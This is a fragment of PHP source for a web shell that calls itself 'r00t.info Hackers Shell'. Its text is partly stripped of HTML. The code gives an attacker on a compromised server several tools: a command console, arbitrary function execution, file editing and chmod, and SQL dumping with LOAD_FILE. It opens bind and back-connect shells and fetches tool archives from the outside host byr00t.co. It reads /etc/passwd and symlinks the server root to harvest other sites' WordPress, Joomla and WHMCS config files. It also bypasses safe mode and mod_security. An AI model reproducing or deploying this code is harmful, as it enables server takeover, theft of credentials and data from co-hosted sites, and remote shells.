\'.htmlspecialchars($f[\'name\']):\'g(\\\'FilesMan\\\',\\\'\'.$f[\'path\'].\'\\\');\r\n">[ \'.htmlspecialchars($f[\'name\']).\' ]\').\'\'.(($f[\'type\']==\'file\')?viewSize($f[\'size\']):$f[\'type\']).\'\'.$f[\'modify\'].\'\'.$f[\'owner\'].\'/\'.$f[\'group\'].\'\'.$f[\'perms\'] .\'R T\'.(($f[\'type\']==\'file\')?\' E D\':\'\').\'
\r\n \r\n \r\n \r\n  \r\n \r\n
\';\r\n printFooter();\r\n } function actionStringTools() { if(!function_exists(\'hex2bin\')) {function hex2bin($p) {return decbin(hexdec($p));\r\n}} if(!function_exists(\'hex2ascii\')) {function hex2ascii($p){$r=\'\';\r\nfor($i=0;\r\n$iString conversions
\';\r\n $stringTools = array( \'Base64 encode\' => \'base64_encode\', \'Base64 decode\' => \'base64_decode\', \'Url encode\' => \'urlencode\', \'Url decode\' => \'urldecode\', \'Full urlencode\' => \'full_urlencode\', \'md5 hash\' => \'md5\', \'sha1 hash\' => \'sha1\', \'crypt\' => \'crypt\', \'CRC32\' => \'crc32\', \'ASCII to HEX\' => \'ascii2hex\', \'HEX to ASCII\' => \'hex2ascii\', \'HEX to DEC\' => \'hexdec\', \'HEX to BIN\' => \'hex2bin\', \'DEC to HEX\' => \'dechex\', \'DEC to BIN\' => \'decbin\', \'BIN to HEX\' => \'bin2hex\', \'BIN to DEC\' => \'bindec\', \'String to lower case\' => \'strtolower\', \'String to upper case\' => \'strtoupper\', \'Htmlspecialchars\' => \'htmlspecialchars\', \'String length\' => \'strlen\', );\r\n if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo "
>\'/> send using AJAX
";\r\n if(!empty($_POST[\'p1\'])) { if(function_exists($_POST[\'p1\'])) echo htmlspecialchars($_POST[\'p1\']($_POST[\'p2\']));\r\n } echo"
";\r\n printFooter();\r\n } function actionFilesTools() { if( isset($_POST[\'p1\']) ) $_POST[\'p1\'] = urldecode($_POST[\'p1\']);\r\n if(@$_POST[\'p2\']==\'download\') { if(is_file($_POST[\'p1\']) && is_readable($_POST[\'p1\'])) { ob_start("ob_gzhandler", 4096);\r\n header("Content-Disposition: attachment;\r\n filename=".basename($_POST[\'p1\']));\r\n if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST[\'p1\']);\r\n header("Content-Type: ".$type);\r\n } $fp = @fopen($_POST[\'p1\'], "r");\r\n if($fp) { while(!@feof($fp)) echo @fread($fp, 1024);\r\n fclose($fp);\r\n } } elseif(is_dir($_POST[\'p1\']) && is_readable($_POST[\'p1\'])) { } exit;\r\n } if( @$_POST[\'p2\'] == \'mkfile\' ) { if(!file_exists($_POST[\'p1\'])) { $fp = @fopen($_POST[\'p1\'], \'w\');\r\n if($fp) { $_POST[\'p2\'] = "edit";\r\n fclose($fp);\r\n } } } printHeader();\r\n echo \'

File tools

\';\r\n if( !file_exists(@$_POST[\'p1\']) ) { echo \'File not exists\';\r\n printFooter();\r\n return;\r\n } $uid = @posix_getpwuid(@fileowner($_POST[\'p1\']));\r\n $gid = @posix_getgrgid(@fileowner($_POST[\'p1\']));\r\n echo \'Name: \'.htmlspecialchars($_POST[\'p1\']).\' Size: \'.(is_file($_POST[\'p1\'])?viewSize(filesize($_POST[\'p1\'])):\'-\').\' Permission: \'.viewPermsColor($_POST[\'p1\']).\' Owner/Group: \'.$uid[\'name\'].\'/\'.$gid[\'name\'].\'
\';\r\n echo \'Create time: \'.date(\'Y-m-d H:i:s\',filectime($_POST[\'p1\'])).\' Access time: \'.date(\'Y-m-d H:i:s\',fileatime($_POST[\'p1\'])).\' Modify time: \'.date(\'Y-m-d H:i:s\',filemtime($_POST[\'p1\'])).\'

\';\r\n if( empty($_POST[\'p2\']) ) $_POST[\'p2\'] = \'view\';\r\n if( is_file($_POST[\'p1\']) ) $m = array(\'View\', \'Highlight\', \'Download\', \'Hexdump\', \'Edit\', \'Chmod\', \'Rename\', \'Touch\');\r\n else $m = array(\'Chmod\', \'Rename\', \'Touch\');\r\n foreach($m as $v) echo \'\'.((strtolower($v)==@$_POST[\'p2\'])?\'[ \'.$v.\' ]\':$v).\' \';\r\n echo \'

\';\r\n switch($_POST[\'p2\']) { case \'view\': echo \'
\';\r\n $fp = @fopen($_POST[\'p1\'], \'r\');\r\n if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024));\r\n @fclose($fp);\r\n } echo \'
\';\r\n break;\r\n case \'highlight\': if( is_readable($_POST[\'p1\']) ) { echo \'
\';\r\n $code = highlight_file($_POST[\'p1\'],true);\r\n echo str_replace(array(\'\'), array(\'\'),$code).\'
\';\r\n } break;\r\n case \'chmod\': if( !empty($_POST[\'p3\']) ) { $perms = 0;\r\n for($i=strlen($_POST[\'p3\'])-1;\r\n$i>=0;\r\n--$i) $perms += (int)$_POST[\'p3\'][$i]*pow(8, (strlen($_POST[\'p3\'])-$i-1));\r\n if(!@chmod($_POST[\'p1\'], $perms)) echo \'Can\\\'t set permissions!
\';\r\n else die(\'\');\r\n } echo \'
\';\r\n break;\r\n case \'edit\': if( !is_writable($_POST[\'p1\'])) { echo \'File isn\\\'t writeable\';\r\n break;\r\n } if( !empty($_POST[\'p3\']) ) { @file_put_contents($_POST[\'p1\'],$_POST[\'p3\']);\r\n echo \'Saved!
\';\r\n } echo \'
\';\r\n break;\r\n case \'hexdump\': $c = @file_get_contents($_POST[\'p1\']);\r\n $n = 0;\r\n $h = array(\'00000000
\',\'\',\'\');\r\n $len = strlen($c);\r\n for ($i=0;\r\n $i<$len;\r\n ++$i) { $h[1] .= sprintf(\'%02X\',ord($c[$i])).\' \';\r\n switch ( ord($c[$i]) ) { case 0: $h[2] .= \' \';\r\n break;\r\n case 9: $h[2] .= \' \';\r\n break;\r\n case 10: $h[2] .= \' \';\r\n break;\r\n case 13: $h[2] .= \' \';\r\n break;\r\n default: $h[2] .= $c[$i];\r\n break;\r\n } $n++;\r\n if ($n == 32) { $n = 0;\r\n if ($i+1 < $len) {$h[0] .= sprintf(\'%08X\',$i+1).\'
\';\r\n} $h[1] .= \'
\';\r\n $h[2] .= "\\n";\r\n } } echo \'
\'.$h[0].\'
\'.$h[1].\'
\'.htmlspecialchars($h[2]).\'
\';\r\n break;\r\n case \'rename\': if( !empty($_POST[\'p3\']) ) { if(!@rename($_POST[\'p1\'], $_POST[\'p3\'])) echo \'Can\\\'t rename!
\';\r\n else die(\'\');\r\n } echo \'
\';\r\n break;\r\n case \'touch\': if( !empty($_POST[\'p3\']) ) { $time = strtotime($_POST[\'p3\']);\r\n if($time) { if(@touch($_POST[\'p1\'],$time,$time)) die(\'\');\r\n else { echo \'Fail!\';\r\n } } else echo \'Bad time format!\';\r\n } echo \'
\';\r\n break;\r\n case \'mkfile\': break;\r\n } echo \'
\';\r\n printFooter();\r\n } function actionBypass() { printHeader();\r\n if(!file_exists(\'cpanel/cpanel.php\')){ $dizin = \'https://byr00t.co/vb/cpanel.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? $name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "cpanel");\r\n $zip = new ZipArchive();\r\n $file = \'cpanel.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'cpanel/\');\r\n if(file_exists(\'cpanel.zip\')){ @unlink(\'cpanel.zip\');\r\n } if($cikar){ echo " ";\r\n } else{ echo \'
Hata! Dosya indirilirken kritik bir hata oluÅŸtu.
\';\r\n } } elseif(file_exists(\'cpanel/cpanel.php\')){ echo " ";\r\n } printFooter();\r\n } function actionConsole() { if(isset($_POST[\'ajax\'])) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n echo "document.cf.cmd.value=\'\';\r\n\\n";\r\n $temp = @iconv($_POST[\'charset\'], \'UTF-8\', addcslashes("\\n$ ".$_POST[\'p1\']."\\n".ex($_POST[\'p1\']),"\\n\\r\\t\\\\\'\\0"));\r\n if(preg_match("!.*cd\\s+([^;\r\n]+)$!",$_POST[\'p1\'],$match)) { if(@chdir($match[1])) { $GLOBALS[\'cwd\'] = @getcwd();\r\n echo "document.mf.c.value=\'".$GLOBALS[\'cwd\']."\';\r\n";\r\n } } echo "document.cf.output.value+=\'".$temp."\';\r\n";\r\n echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;\r\n";\r\n $temp = ob_get_clean();\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n echo \'\';\r\n echo \'

Console

send using AJAX
\';\r\n echo \'
\';\r\n printFooter();\r\n } function actionLogout() { unset($_SESSION[md5($_SERVER[\'HTTP_HOST\'])]);\r\n echo \'\r\n \r\n \r\n\r\n\r\n \r\n
\r\n

r00t.info Hackers Shell

\r\n
\r\n
\r\n

Wso shell

\';\r\n } function actionSelfRemove() { printHeader();\r\n if($_POST[\'p1\'] == \'yes\') { if(@unlink(SELF_PATH)) die(\'Shell has been removed\');\r\n else echo \'unlink error!\';\r\n } echo \'

Suicide

Really want to remove the shell?
Yes
\';\r\n printFooter();\r\n } function actionCgi() { printHeader();\r\n if(!file_exists(\'cgi/rot.cin\')){ $dizin = \'https://byr00t.co/vb/cgi.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? $name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "cgi");\r\n $zip = new ZipArchive();\r\n $file = \'cgi.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'cgi/\');\r\n if(file_exists(\'cgi.zip\')){ @unlink(\'cgi.zip\');\r\n } if($cikar){ chmod(\'cgi/rot.cin\', 0755);\r\n echo " ";\r\n } else{ echo \'
Hata! Dosya indirilirken kritik bir hata oluÅŸtu.
\';\r\n } } elseif(file_exists(\'cgi/rot.cin\')){ echo " ";\r\n } printFooter();\r\n } function actionSql() { class DbClass { var $type;\r\n var $link;\r\n var $res;\r\n function DbClass($type) { $this->type = $type;\r\n } function connect($host, $user, $pass, $dbname){ switch($this->type) { case \'mysql\': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;\r\n break;\r\n case \'pgsql\': $host = explode(\':\', $host);\r\n if(!$host[1]) $host[1]=5432;\r\n if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;\r\n break;\r\n } return false;\r\n } function selectdb($db) { switch($this->type) { case \'mysql\': if (@mysql_select_db($db))return true;\r\n break;\r\n } return false;\r\n } function query($str) { switch($this->type) { case \'mysql\': return $this->res = @mysql_query($str);\r\n break;\r\n case \'pgsql\': return $this->res = @pg_query($this->link,$str);\r\n break;\r\n } return false;\r\n } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res;\r\n switch($this->type) { case \'mysql\': return @mysql_fetch_assoc($res);\r\n break;\r\n case \'pgsql\': return @pg_fetch_assoc($res);\r\n break;\r\n } return false;\r\n } function listDbs() { switch($this->type) { case \'mysql\': return $this->res = @mysql_list_dbs($this->link);\r\n break;\r\n case \'pgsql\': return $this->res = $this->query("SELECT datname FROM pg_database");\r\n break;\r\n } return false;\r\n } function listTables() { switch($this->type) { case \'mysql\': return $this->res = $this->query(\'SHOW TABLES\');\r\n break;\r\n case \'pgsql\': return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != \'information_schema\' AND table_schema != \'pg_catalog\') or table_name = \'pg_user\'");\r\n break;\r\n } return false;\r\n } function error() { switch($this->type) { case \'mysql\': return @mysql_error($this->link);\r\n break;\r\n case \'pgsql\': return @pg_last_error($this->link);\r\n break;\r\n } return false;\r\n } function setCharset($str) { switch($this->type) { case \'mysql\': if(function_exists(\'mysql_set_charset\')) return @mysql_set_charset($str, $this->link);\r\n else $this->query(\'SET CHARSET \'.$str);\r\n break;\r\n case \'mysql\': return @pg_set_client_encoding($this->link, $str);\r\n break;\r\n } return false;\r\n } function dump($table) { switch($this->type) { case \'mysql\': $res = $this->query(\'SHOW CREATE TABLE `\'.$table.\'`\');\r\n $create = mysql_fetch_array($res);\r\n echo $create[1].";\r\n\\n\\n";\r\n $this->query(\'SELECT * FROM `\'.$table.\'`\');\r\n while($item = $this->fetch()) { $columns = array();\r\n foreach($item as $k=>$v) { $item[$k] = "\'".@mysql_real_escape_string($v)."\'";\r\n $columns[] = "`".$k."`";\r\n } echo \'INSERT INTO `\'.$table.\'` (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\r\n\'."\\n";\r\n } break;\r\n case \'pgsql\': $this->query(\'SELECT * FROM \'.$table);\r\n while($item = $this->fetch()) { $columns = array();\r\n foreach($item as $k=>$v) { $item[$k] = "\'".addslashes($v)."\'";\r\n $columns[] = $k;\r\n } echo \'INSERT INTO \'.$table.\' (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\r\n\'."\\n";\r\n } break;\r\n } return false;\r\n } };\r\n $db = new DbClass(@$_POST[\'type\']);\r\n if(@$_POST[\'p2\']==\'download\') { ob_start("ob_gzhandler", 4096);\r\n $db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\']);\r\n $db->selectdb($_POST[\'sql_base\']);\r\n header("Content-Disposition: attachment;\r\n filename=dump.sql");\r\n header("Content-Type: text/plain");\r\n foreach($_POST[\'tbl\'] as $v) $db->dump($v);\r\n exit;\r\n } printHeader();\r\n echo \'

Sql browser

\r\n
\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
TypeHostLoginPasswordDatabase
\r\n \';\r\n $tmp = "";\r\n if(isset($_POST[\'sql_host\'])){ if($db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\'])) { switch($_POST[\'charset\']) { case "Windows-1251": $db->setCharset(\'cp1251\');\r\n break;\r\n case "UTF-8": $db->setCharset(\'utf8\');\r\n break;\r\n case "KOI8-R": $db->setCharset(\'koi8r\');\r\n break;\r\n case "KOI8-U": $db->setCharset(\'koi8u\');\r\n break;\r\n case "cp866": $db->setCharset(\'cp866\');\r\n break;\r\n } $db->listDbs();\r\n echo "\';\r\n } else echo $tmp;\r\n }else echo $tmp;\r\n echo \'
\r\n \';\r\n if(isset($db) && $db->link){ echo "
";\r\n if(!empty($_POST[\'sql_base\'])){ $db->selectdb($_POST[\'sql_base\']);\r\n echo "";\r\n } echo "
Tables:

";\r\n $tbls_res = $db->listTables();\r\n while($item = $db->fetch($tbls_res)) { list($key, $value) = each($item);\r\n $n = $db->fetch($db->query(\'SELECT COUNT(*) as n FROM \'.$value.\'\'));\r\n $value = htmlspecialchars($value);\r\n echo " \r\n".$value." (".$n[\'n\'].")
";\r\n } echo " 		";\r\n if(@$_POST[\'p1\'] == \'select\') { $_POST[\'p1\'] = \'query\';\r\n $db->query(\'SELECT COUNT(*) as n FROM \'.$_POST[\'p2\'].\'\');\r\n $num = $db->fetch();\r\n $num = $num[\'n\'];\r\n echo "".$_POST[\'p2\']." ($num) ";\r\n for($i=0;\r\n$i<($num/30);\r\n$i++) if($i != (int)$_POST[\'p3\']) echo "",($i+1)," ";\r\n else echo ($i+1)," ";\r\n if($_POST[\'type\']==\'pgsql\') $_POST[\'p3\'] = \'SELECT * FROM \'.$_POST[\'p2\'].\' LIMIT 30 OFFSET \'.($_POST[\'p3\']*30);\r\n else $_POST[\'p3\'] = \'SELECT * FROM `\'.$_POST[\'p2\'].\'` LIMIT \'.($_POST[\'p3\']*30).\',30\';\r\n echo "

";\r\n } if((@$_POST[\'p1\'] == \'query\') && !empty($_POST[\'p3\'])) { $db->query(@$_POST[\'p3\']);\r\n if($db->res !== false) { $title = false;\r\n echo \'\';\r\n $line = 1;\r\n while($item = $db->fetch()) { if(!$title) { echo \'\';\r\n foreach($item as $key => $value) echo \'\';\r\n reset($item);\r\n $title=true;\r\n echo \'\';\r\n $line = 2;\r\n } echo \'\';\r\n $line = $line==1?2:1;\r\n foreach($item as $key => $value) { if($value == null) echo \'\';\r\n else echo \'\';\r\n } echo \'\';\r\n } echo \'
\'.$key.\'
null\'.nl2br(htmlspecialchars($value)).\'
\';\r\n } else { echo \'
Error: \'.htmlspecialchars($db->error()).\'
\';\r\n } } echo "

";\r\n echo "

Load file >\'>
";\r\n if(@$_POST[\'p1\'] == \'loadfile\') { $db->query("SELECT LOAD_FILE(\'".addslashes($_POST[\'p2\'])."\') as file");\r\n $file = $db->fetch();\r\n echo \'
\'.htmlspecialchars($file[\'file\']).\'
\';\r\n } } echo \'
\';\r\n printFooter();\r\n } function actionNetwork() { printHeader();\r\n $back_connect_c="";\r\n $back_connect_p="";\r\n $bind_port_c="";\r\n $bind_port_p="";\r\n echo \'

Network tools

\r\n
\r\n
Bind port to /bin/sh
\r\n Port: Password: Using: \r\n
\r\n
\r\n

Back-connect to
\r\n Server: Port: Using: \r\n

\';\r\n if(isset($_POST[\'p1\'])) { function cf($f,$t) { $w=@fopen($f,"w") or @function_exists(\'file_put_contents\');\r\n if($w) { @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));\r\n @fclose($w);\r\n } } if($_POST[\'p1\'] == \'bpc\') { cf("/tmp/bp.c",$bind_port_c);\r\n $out = ex("gcc -o /tmp/bp /tmp/bp.c");\r\n @unlink("/tmp/bp.c");\r\n $out .= ex("/tmp/bp ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "
$out\\n".ex("ps aux | grep bp")."
";\r\n } if($_POST[\'p1\'] == \'bpp\') { cf("/tmp/bp.pl",$bind_port_p);\r\n $out = ex(which("perl")." /tmp/bp.pl ".$_POST[\'p2\']." &");\r\n echo "
$out\\n".ex("ps aux | grep bp.pl")."
";\r\n } if($_POST[\'p1\'] == \'bcc\') { cf("/tmp/bc.c",$back_connect_c);\r\n $out = ex("gcc -o /tmp/bc /tmp/bc.c");\r\n @unlink("/tmp/bc.c");\r\n $out .= ex("/tmp/bc ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "
$out\\n".ex("ps aux | grep bc")."
";\r\n } if($_POST[\'p1\'] == \'bcp\') { cf("/tmp/bc.pl",$back_connect_p);\r\n $out = ex(which("perl")." /tmp/bc.pl ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "
$out\\n".ex("ps aux | grep bc.pl")."
";\r\n } } echo \'
\';\r\n printFooter();\r\n } function actionPortScanner() { printHeader();\r\n echo \'

Port Scanner

\';\r\n echo \'
\';\r\n echo \'
\';\r\n if(isset($_POST[\'host\']) && is_numeric($_POST[\'end\']) && is_numeric($_POST[\'start\'])){ $start = strip_tags($_POST[\'start\']);\r\n $end = strip_tags($_POST[\'end\']);\r\n $host = strip_tags($_POST[\'host\']);\r\n for($i = $start;\r\n $i<=$end;\r\n $i++){ $fp = @fsockopen($host, $i, $errno, $errstr, 3);\r\n if($fp){ echo \'Port \'.$i.\' is open
\';\r\n } flush();\r\n } } else { echo \'

\r\n \r\n \r\n Host:

\r\n Port start:

\r\n Port end:

\r\n \r\n


\';\r\n } echo \'
\';\r\n printFooter();\r\n } function actionReadable() { printHeader();\r\n echo \'

Readable Dirs

\';\r\n echo \'
\';\r\n $sm = ini_get(\'safe_mode\');\r\n if($sm) { echo \'
Error: safe_mode = on

\';\r\n } else { @$passwd = fopen(\'/etc/passwd\',\'r\');\r\n if (!$passwd) { echo \'
[-] Error : coudn`t read /etc/passwd

\';\r\n } else { $pub = array();\r\n $users = array();\r\n $conf = array();\r\n $i = 0;\r\n while(!feof($passwd)) { $str = fgets($passwd);\r\n if ($i > 35) { $pos = strpos($str,\':\');\r\n $username = substr($str,0,$pos);\r\n $dirz = \'/home/\'.$username.\'/public_html/\';\r\n if (($username != \'\')) { if (is_readable($dirz)) { array_push($users,$username);\r\n array_push($pub,$dirz);\r\n } } } $i++;\r\n } echo \'

\';\r\n echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\\n"."
";\r\n echo "[+] Founded ".sizeof($pub)." readable public_html directories\\n"."


";\r\n foreach ($users as $user) { $path = "/home/$user/public_html/";\r\n echo $path."
";\r\n } echo "


[+] Complete...\\n"."
";\r\n } } echo \'
\';\r\n printFooter();\r\n } function actionSymlink() { printHeader();\r\n echo \'

Symlink

\';\r\n $furl = \'http://\'.$_SERVER[\'SERVER_NAME\'].$_SERVER[\'REQUEST_URI\'];\r\n $expld = explode(\'/\',$furl );\r\n $burl =str_replace(end($expld),\'\',$furl);\r\n echo \'
\r\n

[ Domains ] - \r\n [ Whole Server Symlink ] - \r\n [ Config files symlink ]

\';\r\n if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'website\') { echo "
";\r\n $d0mains = @file("/etc/named.conf");\r\n if(!$d0mains){ echo "
Cant access this file on server -> [ /etc/named.conf ]
";\r\n } else { echo "";\r\n $unk = array();\r\n foreach($d0mains as $d0main){ if(@eregi("zone",$d0main)){ preg_match_all(\'#zone "(.*)"#\', $d0main, $domains);\r\n flush();\r\n if(strlen(trim($domains[1][0])) > 2){ $unk[] = $domains[1][0];\r\n flush();\r\n } } } $count=1;\r\n $unk = array_unique($unk);\r\n $l=0;\r\n foreach($unk as $d){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$d));\r\n echo "";\r\n flush();\r\n $count++;\r\n $l=$l?0:1;\r\n } echo "
Count Domains Users
".$count."".$d."".$user[\'name\']."
";\r\n } echo "";\r\n } if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'whole\') { echo "
";\r\n @mkdir(\'sym\',0777);\r\n $hdt = "Options all \\n DirectoryIndex Sux.html \\n AddType text/plain .php \\n AddHandler server-parsed .php \\n AddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any";\r\n $hfp =@fopen (\'sym/.htaccess\',\'w\');\r\n fwrite($hfp ,$hdt);\r\n if(function_exists(\'symlink\')) { @symlink(\'/\',\'sym/root\');\r\n } $d0mains = @file(\'/etc/named.conf\');\r\n if(!$d0mains) { echo "
# Cant access this file on server -> [ /etc/named.conf ]
";\r\n } else { echo "";\r\n $count=1;\r\n $mck = array();\r\n foreach($d0mains as $d0main){ if(@eregi(\'zone\',$d0main)){ preg_match_all(\'#zone "(.*)"#\',$d0main,$domain);\r\n flush();\r\n if(strlen(trim($domain[1][0])) >2){ $mck[] = $domain[1][0];\r\n } } } $mck = array_unique($mck);\r\n $l=0;\r\n foreach($mck as $d) { $user = posix_getpwuid(@fileowner(\'/etc/valiases/\'.$d));\r\n $ddt = $user[\'name\'];\r\n $ddt = $d;\r\n if(@eregi("\\.ir",$d) or @eregi("\\.il",$d)) { $ddt = "
".$d.\'
\';\r\n } echo "";\r\n flush();\r\n $l=$l?0:1;\r\n } echo \'
Count Domains User Symlink
".$count++."\'.$ddt.\' \'.$user[\'name\']."symlink
\';\r\n } echo "";\r\n } if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'config\') { echo "
";\r\n @mkdir(\'sym\',0777);\r\n $hdt = "Options all \\n DirectoryIndex Sux.html \\n AddType text/plain .php \\n AddHandler server-parsed .php \\n AddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any";\r\n $hfp = @fopen (\'sym/.htaccess\',\'w\');\r\n @fwrite($hfp ,$hdt);\r\n if(function_exists(\'symlink\')) { @symlink(\'/\',\'sym/root\');\r\n } $d0mains = @file(\'/etc/named.conf\');\r\n if(!$d0mains) { echo "
# Cant access this file on server -> [ /etc/named.conf ]
";\r\n } else { echo "";\r\n $count = 1;\r\n $l=0;\r\n foreach($d0mains as $d0main){ if(@eregi(\'zone\',$d0main)){ preg_match_all(\'#zone "(.*)"#\',$d0main,$domain);\r\n flush();\r\n if(strlen(trim($domain[1][0]))>2){ $user = posix_getpwuid(@fileowner(\'/etc/valiases/\'.$domain[1][0]));\r\n $c1 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/wp-config.php\';\r\n $ch01 = get_headers($c1);\r\n $cf01 = $ch01[0];\r\n $c2 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/blog/wp-config.php\';\r\n $ch02 = get_headers($c2);\r\n $cf02 = $ch02[0];\r\n $c3 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/configuration.php\';\r\n $ch03 = get_headers($c3);\r\n $cf03 = $ch03[0];\r\n $c4 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/joomla/configuration.php\';\r\n $ch04 = get_headers($c4);\r\n $cf04 = $ch04[0];\r\n $c5 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/includes/config.php\';\r\n $ch05 = get_headers($c5);\r\n $cf05 = $ch05[0];\r\n $c6 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/vb/includes/config.php\';\r\n $ch06 = get_headers($c6);\r\n $cf06 = $ch06[0];\r\n $c7 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/forum/includes/config.php\';\r\n $ch07 = get_headers($c7);\r\n $cf07 = $ch07[0];\r\n $c8 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'public_html/clients/configuration.php\';\r\n $ch08 = get_headers($c8);\r\n $cf08 = $ch08[0];\r\n $c9 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/support/configuration.php\';\r\n $ch09 = get_headers($c9);\r\n $cf09 = $ch09[0];\r\n $c10 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/client/configuration.php\';\r\n $ch10 = get_headers($c10);\r\n $cf10 = $ch10[0];\r\n $c11 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/submitticket.php\';\r\n $ch11 = get_headers($c11);\r\n $cf11 = $ch11[0];\r\n $c12 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/client/configuration.php\';\r\n $ch12 = get_headers($c12);\r\n $cf12 = $ch12[0];\r\n $c13 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/includes/configure.php\';\r\n $ch13 = get_headers($c13);\r\n $cf13 = $ch13[0];\r\n $c14 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/include/app_config.php\';\r\n $ch14 = get_headers($c14);\r\n $cf14 = $ch14[0];\r\n $c15 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/sites/default/settings.php\';\r\n $ch15 = get_headers($c15);\r\n $cf15 = $ch15[0];\r\n $out = \' \r\n\';\r\n if(strpos($cf01,\'200\') == true) { $out = "Wordpress";\r\n } elseif(strpos($cf02,\'200\') == true) { $out = "Wordpress";\r\n } elseif(strpos($cf03,\'200\') == true && strpos($cf11,\'200\') == true) { $out = " WHMCS";\r\n } elseif(strpos($cf09,\'200\') == true) { $out = " WHMCS";\r\n } elseif(strpos($cf10,\'200\') == true) { $out = " WHMCS";\r\n } elseif(strpos($cf03,\'200\') == true) { $out = " Joomla";\r\n } elseif(strpos($cf04,\'200\') == true) { $out = " Joomla";\r\n } elseif(strpos($cf05,\'200\') == true) { $out = " vBulletin";\r\n } elseif(strpos($cf06,\'200\') == true) { $out = " vBulletin";\r\n } elseif(strpos($cf07,\'200\') == true) { $out = " vBulletin";\r\n } elseif(strpos($cf08,\'200\') == true) { $out = " Client Area";\r\n } elseif(strpos($cf12,\'200\') == true) { $out = " Client Area";\r\n } elseif(strpos($cf13,\'200\') == true) { $out = " osCommerce/Zen Cart";\r\n } elseif(strpos($cf14,\'200\') == true) { $out = " Magento";\r\n } elseif(strpos($cf15,\'200\') == true) { $out = " Drupal";\r\n } else { continue;\r\n } echo \'\';\r\n flush();\r\n $l=$l?0:1;\r\n } } } echo "
Count Domains Script
\'.$count++.\'\'.$domain[1][0].\'\'.$user[\'name\'].\'\'.$out.\'
";\r\n } echo "";\r\n } echo "
";\r\n printFooter();\r\n } function actionSafeMode() { printHeader();\r\n echo \'

Safe Mode

\';\r\n echo \'
\';\r\n echo "

| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |

Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh ] files create in following dir
| ".$GLOBALS[\'cwd\']." |

";\r\n echo \'| PHP.INI | | .htaccess(Mod) | | .htaccess(perl) |
